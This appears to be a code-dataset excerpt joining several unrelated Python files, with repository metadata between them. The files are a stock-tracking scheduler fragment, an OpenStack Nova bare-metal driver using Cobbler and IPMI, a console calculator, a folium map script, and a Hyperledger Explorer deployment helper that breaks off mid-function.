print(fill_str_space('분류',25),fill_str_space('종목코드',10),fill_str_space('종목명',35),fill_str_space('상태',10),fill_str_space('최초자산',10),fill_str_space('현재자산',10),fill_str_space('이익',10),' --- ', fill_str_space('실시간현재 자산',20),fill_str_space('실시간 이익',10))
print('--------------------------------------------------------------------------------------------------------------------------------------------------------------------------')
for x, stock in enumerate(stockDataList):
print(fill_str_space('['+stock[0]+']',25),fill_str_space(stock[2],10),fill_str_space(stock[3],35),fill_str_space(stock[1],10),fill_str_space(format(stock_constant.CURRENT_AMT,','),10),fill_str_space(format(int(stock[4]),','),10),fill_str_space('['+str(format(int(stock[4]) - stock_constant.CURRENT_AMT,','))+']',10),' --- ',fill_str_space(format(stock[5],','),20),fill_str_space('['+str(format(int(stock[5]) - stock_constant.CURRENT_AMT,','))+']',10))
# main process
def main_process():
# setAllStockSell()
# getLastCurrentAllData()
getCurrentAmtData()
if __name__ == '__main__':
global CRAWLING_TARGET_FROM_MODULE
CRAWLING_TARGET_FROM_MODULE = []
for idx, data in enumerate(stock_constant.CRAWLING_TARGET):
if data['skip'] == False:
CRAWLING_TARGET_FROM_MODULE.append(data)
scheduler = BlockingScheduler()
scheduler.add_job(main_process, 'interval', seconds=interval_seconds)
main_process()
try:
scheduler.start()
except Exception as err:
print(err)
| 44.623037 | 460 | 0.510853 | 932 | 8,523 | 4.454936 | 0.225322 | 0.025289 | 0.054913 | 0.033719 | 0.458815 | 0.429913 | 0.360549 | 0.333574 | 0.317437 | 0.280829 | 0 | 0.020458 | 0.283116 | 8,523 | 190 | 461 | 44.857895 | 0.659083 | 0.055497 | 0 | 0.253731 | 0 | 0 | 0.211957 | 0.052263 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059701 | false | 0 | 0.044776 | 0 | 0.126866 | 0.089552 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8eb7493408bc19d2d91746987af751c90a28ab2 | 23,333 | py | Python | nova/virt/dodai/connection.py | nii-cloud/dodai-compute | d9bea632913c0ddc6f59c6120f60daea369d09cc | [
"Apache-2.0"
] | null | null | null | nova/virt/dodai/connection.py | nii-cloud/dodai-compute | d9bea632913c0ddc6f59c6120f60daea369d09cc | [
"Apache-2.0"
] | null | null | null | nova/virt/dodai/connection.py | nii-cloud/dodai-compute | d9bea632913c0ddc6f59c6120f60daea369d09cc | [
"Apache-2.0"
] | 1 | 2020-05-10T16:36:03.000Z | 2020-05-10T16:36:03.000Z | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A dodai hypervisor.
"""
import os
import os.path
import tempfile
import httplib, urllib
from nova import exception
from nova import log as logging
from nova import utils
from nova.compute import power_state
from nova.compute import instance_types
from nova.virt import driver
from nova import db
from nova.virt import images
from nova import flags
from nova.virt.dodai import ofc_utils
from nova.compute import vm_states
from nova.db.sqlalchemy.session import get_session_dodai
from eventlet import greenthread
LOG = logging.getLogger('nova.virt.dodai')
FLAGS = flags.FLAGS
def get_connection(_):
# The read_only parameter is ignored.
return DodaiConnection.instance()
class DodaiConnection(driver.ComputeDriver):
"""Dodai hypervisor driver"""
def __init__(self):
self.host_status = {
'host_name-description': 'Dodai Compute',
'host_hostname': 'dodai-compute',
'host_memory_total': 8000000000,
'host_memory_overhead': 10000000,
'host_memory_free': 7900000000,
'host_memory_free_computed': 7900000000,
'host_other_config': {},
'host_ip_address': '192.168.1.109',
'host_cpu_info': {},
'disk_available': 500000000000,
'disk_total': 600000000000,
'disk_used': 100000000000,
'host_uuid': 'cedb9b39-9388-41df-8891-c5c9a0c0fe5f',
'host_name_label': 'dodai-compute'}
@classmethod
def instance(cls):
if not hasattr(cls, '_instance'):
cls._instance = cls()
return cls._instance
def init_host(self, host):
"""Initialize anything that is necessary for the driver to function,
including catching up with currently running VM's on the given host."""
LOG.debug("init_host")
def get_host_stats(self, refresh=False):
"""Return Host Status of ram, disk, network."""
return self.host_status
def get_info(self, instance_name):
"""Get the current status of an instance, by name (not ID!)
Returns a dict containing:
:state: the running state, one of the power_state codes
:max_mem: (int) the maximum memory in KBytes allowed
:mem: (int) the memory in KBytes used by the domain
:num_cpu: (int) the number of virtual CPUs for the domain
:cpu_time: (int) the CPU time used in nanoseconds
"""
LOG.debug("get_info")
instance_id = self._instance_name_to_id(instance_name)
bmm = db.bmm_get_by_instance_id(None, instance_id)
status = PowerManager(bmm["ipmi_ip"]).status()
if status == "on":
inst_power_state = power_state.RUNNING
else:
inst_power_state = power_state.SHUTOFF
return {'state': inst_power_state,
'max_mem': 0,
'mem': 0,
'num_cpu': 2,
'cpu_time': 0}
def list_instances(self):
"""
Return the names of all the instances known to the virtualization
layer, as a list.
"""
LOG.debug("list_instances")
instance_ids = []
bmms = db.bmm_get_all(None)
for bmm in bmms:
if not bmm["instance_id"]:
continue
instance_ids.append(self._instance_id_to_name(bmm["instance_id"]))
return instance_ids
def list_instances_detail(self, context):
"""Return a list of InstanceInfo for all registered VMs"""
LOG.debug("list_instances_detail")
info_list = []
bmms = db.bmm_get_all_by_instance_id_not_null(context)
for bmm in bmms:
instance = db.instance_get(context, bmm["instance_id"])
status = PowerManager(bmm["ipmi_ip"]).status()
if status == "off":
inst_power_state = power_state.SHUTOFF
if instance["vm_state"] == vm_states.ACTIVE:
db.instance_update(context, instance["id"], {"vm_state": vm_states.STOPPED})
else:
inst_power_state = power_state.RUNNING
if instance["vm_state"] == vm_states.STOPPED:
db.instance_update(context, instance["id"], {"vm_state": vm_states.ACTIVE})
info_list.append(driver.InstanceInfo(self._instance_id_to_name(bmm["instance_id"]),
inst_power_state))
return info_list
def _instance_id_to_name(self, instance_id):
return FLAGS.instance_name_template % instance_id
def _instance_name_to_id(self, instance_name):
return int(instance_name.split("-")[1], 16)
def spawn(self, context, instance,
network_info=None, block_device_info=None):
"""
Create a new instance/VM/domain on the virtualization platform.
Once this successfully completes, the instance should be
running (power_state.RUNNING).
If this fails, any partial instance should be completely
cleaned up, and the virtualization platform should be in the state
that it was before this call began.
:param context: security context
:param instance: Instance object as returned by DB layer.
This function should use the data there to guide
the creation of the new instance.
:param network_info:
:py:meth:`~nova.network.manager.NetworkManager.get_instance_nw_info`
:param block_device_info:
"""
LOG.debug("spawn")
instance_zone, cluster_name, vlan_id, create_cluster = self._parse_zone(instance["availability_zone"])
# update instances table
bmm, reuse = self._select_machine(context, instance)
instance["display_name"] = bmm["name"]
instance["availability_zone"] = instance_zone
db.instance_update(context,
instance["id"],
{"display_name": bmm["name"],
"availability_zone": instance_zone})
if vlan_id:
db.bmm_update(context, bmm["id"], {"availability_zone": cluster_name,
"vlan_id": vlan_id,
"service_ip": None})
if instance_zone == "resource_pool":
self._install_machine(context, instance, bmm, cluster_name, vlan_id)
else:
self._update_ofc(bmm, cluster_name)
if bmm["instance_id"]:
db.instance_destroy(context, bmm["instance_id"])
if reuse:
db.bmm_update(context, bmm["id"], {"status": "used",
"instance_id": instance["id"]})
else:
self._install_machine(context, instance, bmm, cluster_name, vlan_id)
if instance["key_data"]:
self._inject_key(bmm["pxe_ip"], str(instance["key_data"]))
def _inject_key(self, pxe_ip, key_data):
conn = httplib.HTTPConnection(pxe_ip, "4567")
params = urllib.urlencode({"key_data": key_data.strip()})
headers = {'Content-type': 'application/x-www-form-urlencoded', 'Accept': 'text/plain'}
conn.request("PUT", "/services/dodai-instance/key.json", params, headers)
response = conn.getresponse()
data = response.read()
LOG.debug(response.status)
LOG.debug(response.reason)
LOG.debug(data)
def _parse_zone(self, zone):
create_cluster = False
vlan_id = None
cluster_name = "resource_pool"
instance_zone = zone
parts = zone.split(",")
if len(parts) >= 2:
if parts[0] == "C":
parts.pop(0)
create_cluster = True
cluster_name, vlan_id = parts
vlan_id = int(vlan_id)
instance_zone = ",".join(parts)
return instance_zone, cluster_name, vlan_id, create_cluster
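    # Illustrative examples (added for clarity, derived from the parsing
    # rules above):
    #   _parse_zone("resource_pool")   -> ("resource_pool", "resource_pool", None, False)
    #   _parse_zone("cluster1,100")    -> ("cluster1,100", "cluster1", 100, False)
    #   _parse_zone("C,cluster1,100")  -> ("cluster1,100", "cluster1", 100, True)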
def _install_machine(self, context, instance, bmm, cluster_name, vlan_id, update_instance=False):
db.bmm_update(context, bmm["id"], {"instance_id": instance["id"]})
mac = self._get_pxe_mac(bmm)
# fetch image
image_base_path = self._get_cobbler_image_path()
if not os.path.exists(image_base_path):
utils.execute('mkdir', '-p', image_base_path)
image_path = self._get_cobbler_image_path(instance)
if not os.path.exists(image_path):
image_meta = images.fetch(context,
instance["image_ref"],
image_path,
instance["user_id"],
instance["project_id"])
else:
image_meta = images.show(context, instance["image_ref"])
image_type = "server"
image_name = image_meta["name"] or image_meta["properties"]["image_location"]
if image_name.find("dodai-deploy") == -1:
image_type = "node"
# begin to install os
pxe_ip = bmm["pxe_ip"] or "None"
pxe_mac = bmm["pxe_mac"] or "None"
storage_ip = bmm["storage_ip"] or "None"
storage_mac = bmm["storage_mac"] or "None"
service_mac1 = bmm["service_mac1"] or "None"
service_mac2 = bmm["service_mac2"] or "None"
instance_path = self._get_cobbler_instance_path(instance)
if not os.path.exists(instance_path):
utils.execute('mkdir', '-p', instance_path)
self._cp_template("create.sh",
self._get_cobbler_instance_path(instance, "create.sh"),
{"INSTANCE_ID": instance["id"],
"IMAGE_ID": instance["image_ref"],
"COBBLER": FLAGS.cobbler,
"HOST_NAME": bmm["name"],
"STORAGE_IP": storage_ip,
"STORAGE_MAC": storage_mac,
"PXE_IP": pxe_ip,
"PXE_MAC": pxe_mac,
"SERVICE_MAC1": bmm["service_mac1"],
"SERVICE_MAC2": bmm["service_mac2"],
"IMAGE_TYPE": image_type,
"MONITOR_PORT": FLAGS.dodai_monitor_port,
"ROOT_SIZE": FLAGS.dodai_partition_root_gb,
"SWAP_SIZE": FLAGS.dodai_partition_swap_gb,
"EPHEMERAL_SIZE": FLAGS.dodai_partition_ephemeral_gb,
"KDUMP_SIZE": FLAGS.dodai_partition_kdump_gb})
self._cp_template("pxeboot_action",
self._get_pxe_boot_file(mac),
{"INSTANCE_ID": instance["id"],
"COBBLER": FLAGS.cobbler,
"PXE_MAC": pxe_mac,
"ACTION": "create"})
LOG.debug("Reboot or power on.")
self._reboot_or_power_on(bmm["ipmi_ip"])
# wait until starting to install os
while self._get_state(context, instance) != "install":
greenthread.sleep(20)
LOG.debug("Wait until begin to install instance %s." % instance["id"])
self._cp_template("pxeboot_start", self._get_pxe_boot_file(mac), {})
# wait until starting to reboot
while self._get_state(context, instance) != "install_reboot":
greenthread.sleep(20)
LOG.debug("Wait until begin to reboot instance %s after os has been installed." % instance["id"])
power_manager = PowerManager(bmm["ipmi_ip"])
power_manager.soft_off()
while power_manager.status() == "on":
greenthread.sleep(20)
LOG.debug("Wait unit the instance %s shuts down." % instance["id"])
power_manager.on()
# wait until installation of os finished
while self._get_state(context, instance) != "installed":
greenthread.sleep(20)
LOG.debug("Wait until instance %s installation finished." % instance["id"])
if cluster_name == "resource_pool":
status = "active"
else:
status = "used"
db.bmm_update(context, bmm["id"], {"status": status})
if update_instance:
db.instance_update(context, instance["id"], {"vm_state": vm_states.ACTIVE})
def _update_ofc(self, bmm, cluster_name):
try:
ofc_utils.update_for_run_instance(FLAGS.ofc_service_url,
cluster_name,
bmm["server_port1"],
bmm["server_port2"],
bmm["dpid1"],
bmm["dpid2"])
except Exception as ex:
LOG.exception(_("OFC exception %s"), unicode(ex))
def _get_state(self, context, instance):
# check if instance exists
instance_ref = db.instance_get(context, instance["id"])
if instance_ref["deleted"]:
raise exception.InstanceNotFound(instance_id=instance["id"])
path = self._get_cobbler_instance_path(instance, "state")
if not os.path.exists(path):
return ""
if not os.path.isfile(path):
return ""
f = open(path)
state = f.read().strip()
f.close()
LOG.debug("State of instance %d: %s" % (instance["id"], state))
return state
def _get_pxe_mac(self, bmm):
return "01-%s" % bmm["pxe_mac"].replace(":", "-").lower()
def _select_machine(self, context, instance):
inst_type = instance_types.get_instance_type(instance['instance_type_id'])
bmm_found = None
reuse = False
# create a non autocommit session
session = get_session_dodai(False)
session.begin()
try:
bmms = db.bmm_get_all_by_instance_type(context, inst_type["name"], session)
if instance["availability_zone"] == "resource_pool": #Add a machine to resource pool.
for bmm in bmms:
if bmm["availability_zone"] != "resource_pool":
continue
if bmm["status"] != "inactive":
continue
bmm_found = bmm
break
else:
for bmm in bmms:
if bmm["availability_zone"] != "resource_pool":
continue
if bmm["status"] != "active":
continue
instance_ref = db.instance_get(context, bmm["instance_id"])
if instance_ref["image_ref"] != instance["image_ref"]:
continue
bmm_found = bmm
reuse = True
break
if not bmm_found:
for bmm in bmms:
if bmm["status"] == "used" or bmm["status"] == "processing":
continue
bmm_found = bmm
reuse = False
break
if bmm_found:
db.bmm_update(context, bmm_found["id"], {"status": "processing"}, session)
except Exception as ex:
LOG.exception(ex)
session.rollback()
raise exception.BareMetalMachineUnavailable()
session.commit()
if bmm_found:
return bmm_found, reuse
raise exception.BareMetalMachineUnavailable()
def _get_cobbler_instance_path(self, instance, file_name = ""):
return os.path.join(FLAGS.cobbler_path,
"instances",
str(instance["id"]),
file_name)
def _get_cobbler_image_path(self, instance = None):
if instance:
return os.path.join(FLAGS.cobbler_path,
"images",
str(instance["image_ref"]))
else:
return os.path.join(FLAGS.cobbler_path,
"images")
def _get_pxe_boot_file(self, mac):
return os.path.join(FLAGS.pxe_boot_path, mac)
def _get_disk_size_mb(self, instance):
inst_type_id = instance['instance_type_id']
inst_type = instance_types.get_instance_type(inst_type_id)
if inst_type["local_gb"] == 0:
return 10 * 1024
return inst_type["local_gb"] * 1024
def _reboot_or_power_on(self, ip):
power_manager = PowerManager(ip)
status = power_manager.status()
LOG.debug("The power is " + status)
if status == "off":
power_manager.on()
else:
power_manager.reboot()
def _cp_template(self, template_name, dest_path, params):
f = open(utils.abspath("virt/dodai/" + template_name + ".template"), "r")
content = f.read()
f.close()
path = os.path.dirname(dest_path)
if not os.path.exists(path):
os.makedirs(path)
for key, value in params.iteritems():
content = content.replace(key, str(value))
f = open(dest_path, "w")
f.write(content)
        f.close()
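        # Illustrative example (added for clarity): with params of
        # {"INSTANCE_ID": 7}, every literal occurrence of the substring
        # "INSTANCE_ID" in the template body becomes "7" before the result is
        # written to dest_path. Keys are plain substrings rather than
        # delimited placeholders, so a key that is a prefix of another key
        # could collide.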
def destroy(self, context, instance, network_info, cleanup=True):
"""Destroy (shutdown and delete) the specified instance.
If the instance is not found (for example if networking failed), this
function should still succeed. It's probably a good idea to log a
warning in that case.
:param instance: Instance object as returned by DB layer.
:param network_info:
:py:meth:`~nova.network.manager.NetworkManager.get_instance_nw_info`
:param cleanup:
"""
LOG.debug("destroy")
bmm = db.bmm_get_by_instance_id(context, instance["id"])
db.bmm_update(context, bmm["id"], {"status": "processing"})
mac = self._get_pxe_mac(bmm)
# update ofc
self._update_ofc_for_destroy(context, bmm)
db.bmm_update(context, bmm["id"], {"vlan_id": None,
"availability_zone": "resource_pool"})
# begin to delete os
self._cp_template("delete.sh",
self._get_cobbler_instance_path(instance, "delete.sh"),
{"INSTANCE_ID": instance["id"],
"COBBLER": FLAGS.cobbler,
"MONITOR_PORT": FLAGS.dodai_monitor_port})
self._cp_template("pxeboot_action",
self._get_pxe_boot_file(mac),
{"INSTANCE_ID": instance["id"],
"COBBLER": FLAGS.cobbler,
"PXE_MAC": bmm["pxe_mac"],
"ACTION": "delete"})
self._reboot_or_power_on(bmm["ipmi_ip"])
# wait until starting to delete os
while self._get_state(context, instance) != "deleted":
greenthread.sleep(20)
LOG.debug("Wait until data of instance %s was deleted." % instance["id"])
utils.execute("rm", "-rf", self._get_cobbler_instance_path(instance));
# update db
db.bmm_update(context, bmm["id"], {"instance_id": None,
"service_ip": None})
return db.bmm_get(context, bmm["id"])
def _update_ofc_for_destroy(self, context, bmm):
# update ofc
try:
LOG.debug("vlan_id: " + str(bmm["vlan_id"]))
ofc_utils.update_for_terminate_instance(FLAGS.ofc_service_url,
bmm["availability_zone"],
bmm["server_port1"],
bmm["server_port2"],
bmm["dpid1"],
bmm["dpid2"],
bmm["vlan_id"])
except Exception as ex:
LOG.exception(_("OFC exception %s"), unicode(ex))
def add_to_resource_pool(self, context, instance, bmm):
# begin to install default os
self._install_machine(context, instance, bmm, "resource_pool", None, True)
def stop(self, context, instance):
LOG.debug("stop")
bmm = db.bmm_get_by_instance_id(context, instance["id"])
PowerManager(bmm["ipmi_ip"]).off()
def start(self, context, instance):
LOG.debug("start")
bmm = db.bmm_get_by_instance_id(context, instance["id"])
PowerManager(bmm["ipmi_ip"]).on()
def reboot(self, instance, network_info):
"""Reboot the specified instance.
:param instance: Instance object as returned by DB layer.
:param network_info:
:py:meth:`~nova.network.manager.NetworkManager.get_instance_nw_info`
"""
LOG.debug("reboot")
bmm = db.bmm_get_by_instance_id(None, instance["id"])
PowerManager(bmm["ipmi_ip"]).reboot()
def update_available_resource(self, ctxt, host):
"""Updates compute manager resource info on ComputeNode table.
This method is called when nova-compute launches, and
whenever admin executes "nova-manage service update_resource".
:param ctxt: security context
:param host: hostname that compute manager is currently running
"""
LOG.debug("update_available_resource")
return
def reset_network(self, instance):
"""reset networking for specified instance"""
LOG.debug("reset_network")
return
class PowerManager(object):
def __init__(self, ip):
self.ip = ip
def on(self):
return self._execute("on")
def off(self):
return self._execute("off")
def soft_off(self):
return self._execute("soft")
def reboot(self):
return self._execute("reset")
def status(self):
parts = self._execute("status").split(" ")
return parts[3].strip()
def _execute(self, subcommand):
out, err = utils.execute("/usr/bin/ipmitool", "-I", "lan", "-H", self.ip, "-U", FLAGS.ipmi_username, "-P", FLAGS.ipmi_password, "chassis", "power", subcommand)
return out
| 37.755663 | 167 | 0.563322 | 2,612 | 23,333 | 4.801302 | 0.175727 | 0.040667 | 0.005741 | 0.011482 | 0.335061 | 0.273981 | 0.216011 | 0.154294 | 0.13101 | 0.120644 | 0 | 0.011061 | 0.333562 | 23,333 | 617 | 168 | 37.816856 | 0.795434 | 0.148116 | 0 | 0.249389 | 0 | 0 | 0.131001 | 0.009982 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095355 | false | 0.002445 | 0.041565 | 0.02445 | 0.212714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8ecbf3c365cb4d5599fc420b9e80f3725106ed9 | 1,170 | py | Python | Calculadora1.0.py | Caio-Moretti/Calculadora_1.0 | 26ad132641a224479197a1b503465ec44b339fff | [
"MIT"
] | null | null | null | Calculadora1.0.py | Caio-Moretti/Calculadora_1.0 | 26ad132641a224479197a1b503465ec44b339fff | [
"MIT"
] | null | null | null | Calculadora1.0.py | Caio-Moretti/Calculadora_1.0 | 26ad132641a224479197a1b503465ec44b339fff | [
"MIT"
] | null | null | null | # Calculator written in Python.
# Infinite loop until a valid option is selected.
while True:
titulo = " Python Calculator "
print(titulo.center(50, '='))
print()
print('Selecione o número da operação desejada: ')
print('\n1 - Soma\n'
'2 - Subtração\n'
'3 - Multiplicação\n'
'4 - Divisão\n')
    resp = int(input('Digite sua opção (1/2/3/4): '))  # the user's menu choice
    n1 = float(input('Digite o primeiro número: '))  # first number
    n2 = float(input('Digite o segundo número: '))  # second number
    # Conditionals for each option.
if resp == 1:
print(f'{n1} + {n2} = {n1 + n2}')
        break  # leaves the infinite loop (the user picked a valid option)
elif resp == 2:
print(f'{n1} - {n2} = {n1 - n2}')
break
elif resp == 3:
print(f'{n1} x {n2} = {n1 * n2}')
break
    elif resp == 4:
        # Guard against division by zero before printing the result.
        if n2 == 0:
            print('[ERRO!] Divisão por zero não é permitida.')
        else:
            print(f'{n1} ÷ {n2} = {n1 / n2}')
            break
    # Error case: the user typed an invalid option.
    # Show the error and restart the loop.
else:
print('[ERRO!] Opção inválida, tente novamente.')
print()
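# Alternative sketch (added for illustration; not part of the original
# script): the four branches above can be expressed as a dictionary dispatch,
# which avoids the if/elif chain. Kept commented out so the script's
# behaviour is unchanged.
# operacoes = {1: lambda a, b: a + b,
#              2: lambda a, b: a - b,
#              3: lambda a, b: a * b,
#              4: lambda a, b: a / b if b != 0 else None}
# if resp in operacoes:
#     print(operacoes[resp](n1, n2))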
| 34.411765 | 94 | 0.564957 | 156 | 1,170 | 4.24359 | 0.455128 | 0.036254 | 0.048338 | 0.066465 | 0.098187 | 0.098187 | 0.057402 | 0 | 0 | 0 | 0 | 0.038835 | 0.295727 | 1,170 | 33 | 95 | 35.454545 | 0.76335 | 0.282906 | 0 | 0.222222 | 0 | 0 | 0.399276 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.37037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8ed43bb71c54d562b7a95bc4eec941727c4d9a5 | 727 | py | Python | map.py | mwweinberg/elevation_grid | c74598beec1df63286a40e13996e807ddf35b5f5 | [
"MIT"
] | null | null | null | map.py | mwweinberg/elevation_grid | c74598beec1df63286a40e13996e807ddf35b5f5 | [
"MIT"
] | null | null | null | map.py | mwweinberg/elevation_grid | c74598beec1df63286a40e13996e807ddf35b5f5 | [
"MIT"
] | null | null | null | import folium
import json
from folium import plugins
with open('land.geojson') as f:
worldArea = json.load(f)
# folium needs a non-empty attr string when tiles is set to 'None'
worldMap = folium.Map(
location=[0, 0],
tiles='None',
attr="<a href=https://michaelweinberg.org/> </a>",
zoom_start=2,)
#this styles the geojson layer
layer_style = {'fillColor': '#FFFAFA', 'color': 'black'}
folium.GeoJson(
    worldArea,
    style_function=lambda x: layer_style).add_to(worldMap)
#this adds and styles the marker
folium.CircleMarker(
(34.0522, -118.2437),
radius=10,
weight=4,
color="black",
fill_color="black",
fill_opacity=.5).add_to(worldMap)
worldMap.save('worldmap.html') | 23.451613 | 70 | 0.68088 | 105 | 727 | 4.638095 | 0.638095 | 0.061602 | 0.053388 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033501 | 0.178817 | 727 | 31 | 71 | 23.451613 | 0.782245 | 0.177442 | 0 | 0 | 0 | 0 | 0.17953 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.130435 | 0 | 0.130435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8ef01a997224933628efe6c77f98d912dac22d7 | 8,563 | py | Python | mamba/blockchain/explorer/commands.py | ninhpham0902/akc-mamba | 3454b8365d69a4c5f543f71760a495296fa0a5e8 | [
"MIT"
] | 7 | 2020-04-22T02:35:24.000Z | 2022-01-16T17:14:01.000Z | mamba/blockchain/explorer/commands.py | ninhpham0902/akc-mamba | 3454b8365d69a4c5f543f71760a495296fa0a5e8 | [
"MIT"
] | 9 | 2020-04-07T09:11:08.000Z | 2020-12-29T02:35:12.000Z | mamba/blockchain/explorer/commands.py | ninhpham0902/akc-mamba | 3454b8365d69a4c5f543f71760a495296fa0a5e8 | [
"MIT"
] | 7 | 2020-07-30T02:27:14.000Z | 2022-02-13T09:58:55.000Z | import click
import yaml
import re
import json
import os
import shlex
import time
from kubernetes import client
from os import path
from utils import hiss, util
from settings import settings
def get_namespace():
# Get domain
domains = settings.ORDERER_DOMAINS.split(' ')
if len(domains) == 0:
domains = settings.PEER_DOMAINS.split(' ')
explorer_namespace = domains[0]
# Create temp folder & namespace
settings.k8s.prereqs(explorer_namespace)
return explorer_namespace
def setup_explorer_db():
# Get domain
explorer_db_namespace = get_namespace()
# Create temp folder & namespace
settings.k8s.prereqs(explorer_db_namespace)
dict_env = {
'DOMAIN': explorer_db_namespace,
'DATABASE_PASSWORD': 'Akachain'
}
# Deploy explorer db sts
explorer_db_template = '%s/explorer/explorer-db-deployment.yaml' % util.get_k8s_template_path()
settings.k8s.apply_yaml_from_template(
namespace=explorer_db_namespace, k8s_template_file=explorer_db_template, dict_env=dict_env)
# Deploy explorer db svc
explorer_db_svc_template = '%s/explorer/explorer-db-service.yaml' % util.get_k8s_template_path()
settings.k8s.apply_yaml_from_template(
namespace=explorer_db_namespace, k8s_template_file=explorer_db_svc_template, dict_env=dict_env)
# Create tables
## Find explorer_db pod
pods = settings.k8s.find_pod(namespace=explorer_db_namespace, keyword="explorer-db")
if not pods:
        return hiss.hiss('cannot find explorer-db pod')
create_tbl_cmd = 'chmod 700 /opt/createdb_new.sh; /opt/createdb_new.sh'
exec_command = [
'/bin/bash',
'-c',
'%s' % (create_tbl_cmd)]
result_get_folder = settings.k8s.exec_pod(
podName=pods[0], namespace=explorer_db_namespace, command=exec_command)
hiss.sub_echo(result_get_folder.data)
def generate_explorer_config():
# Load template config
config_template_path = os.path.abspath(os.path.join(__file__, "../config.json"))
with open(config_template_path, 'r') as f:
explorer_config = json.load(f)
# Update config
orgs = settings.PEER_ORGS.split(' ')
orgs_msp = []
for org in orgs:
orgs_msp.append('%sMSP' % org)
client = {
orgs[0]: {
'tlsEnable': True,
'organization': orgs_msp[0],
'channel': settings.CHANNEL_NAME,
'credentialStore': {
'path': '/opt/explorer/crypto-path/fabric-client-kv-%s' % orgs[0],
'cryptoStore': {
'path': '/tmp/crypto-store/fabric-client-kv-%s' % orgs[0]
}
}
}
}
explorer_config['network-configs']['network-1']['clients'] = client
channel_peers = {}
for x in range(len(orgs)):
domain = util.get_domain(orgs[x])
for y in range(int(settings.NUM_PEERS)):
peer_name = 'peer%s-%s.%s' % (y, orgs[x], domain)
channel_peers[peer_name] = {}
explorer_config['network-configs']['network-1']['channels'] = {
'%s' % settings.CHANNEL_NAME: {
'peers': channel_peers,
'connection': {
'timeout': {
'peer': {
"endorser": "6000",
"eventReg": "6000",
"eventHub": "6000"
}
}
}
}
}
orgs_config = {}
# org
for i in range(len(orgs)):
domain = util.get_domain(orgs[i])
p_config = {
'mspid': '%s' % orgs_msp[i],
'fullpath': False,
'adminPrivateKey': {
'path': '/opt/explorer/crypto-config/peerOrganizations/%s/users/admin/msp/keystore' % domain
},
'signedCert': {
'path': '/opt/explorer/crypto-config/peerOrganizations/%s/users/admin/msp/signcerts' % domain
}
}
orgs_config[orgs_msp[i]] = p_config
# orderer
orderers = settings.ORDERER_ORGS.split(' ')
domain = util.get_domain(orderers[0])
o_config = {
'mspid': '%sMSP' % orderers[0],
'adminPrivateKey': {
'path': '/opt/explorer/crypto-config/ordererOrganizations/'+domain+'/users/admin/msp/keystore'
}
}
orgs_config['%sMSP' % settings.ORDERER_ORGS] = o_config
explorer_config['network-configs']['network-1']['organizations'] = orgs_config
# peers
peers_config = {}
for x in range(len(orgs)):
domain = util.get_domain(orgs[x])
for y in range(int(settings.NUM_PEERS)):
peer_name = 'peer%s-%s.%s' % (y, orgs[x], domain)
config = {
'tlsCACerts': {
'path': '/opt/explorer/crypto-config/peerOrganizations/'+domain+'/peers/peer%s.%s' % (y, domain)+'/tls/tlsca.mambatest-cert.pem'
},
'url': 'grpcs://%s:7051' % peer_name,
'eventUrl': 'grpcs://%s:7053' % peer_name,
'grpcOptions': {
'ssl-target-name-override': peer_name
}
}
peers_config[peer_name] = config
explorer_config['network-configs']['network-1']['peers'] = peers_config
# orderers
orderers_config = {}
for x in range(len(orderers)):
domain = util.get_domain(orderers[x])
for y in range(int(settings.NUM_ORDERERS)):
orderer_name = 'orderer%s-%s.%s' % (y, orderers[y], domain)
config = {
'url': 'grpcs://%s:7050' % orderer_name,
'grpcOptions': {
'ssl-target-name-override': orderer_name
},
'tlsCACerts': {
'path': '/opt/explorer/crypto-config/ordererOrganizations/'+domain+'/orderers/orderer%s.%s' % (y, domain)+'/tls/tlsca.ordererhai-cert.pem'
}
}
orderers_config[orderer_name] = config
explorer_config['network-configs']['network-1']['orderers'] = orderers_config
return json.dumps(explorer_config)
def create_explorer_config_in_efs(explorer_config):
# Find efs pod
pods = settings.k8s.find_pod(namespace="default", keyword="test-efs")
if not pods:
        return hiss.hiss('cannot find efs pod')
    config_path = '%s/explorer-config' % settings.EFS_ROOT
    # quote the JSON payload so the shell does not split it on spaces/quotes
    exec_command = [
        '/bin/bash',
        '-c',
        'mkdir -p ' + config_path + '; cd ' + config_path +
        '; echo ' + shlex.quote(explorer_config) + ' > config.json']
create_file = settings.k8s.exec_pod(
podName=pods[0], namespace="default", command=exec_command)
if create_file.success == False:
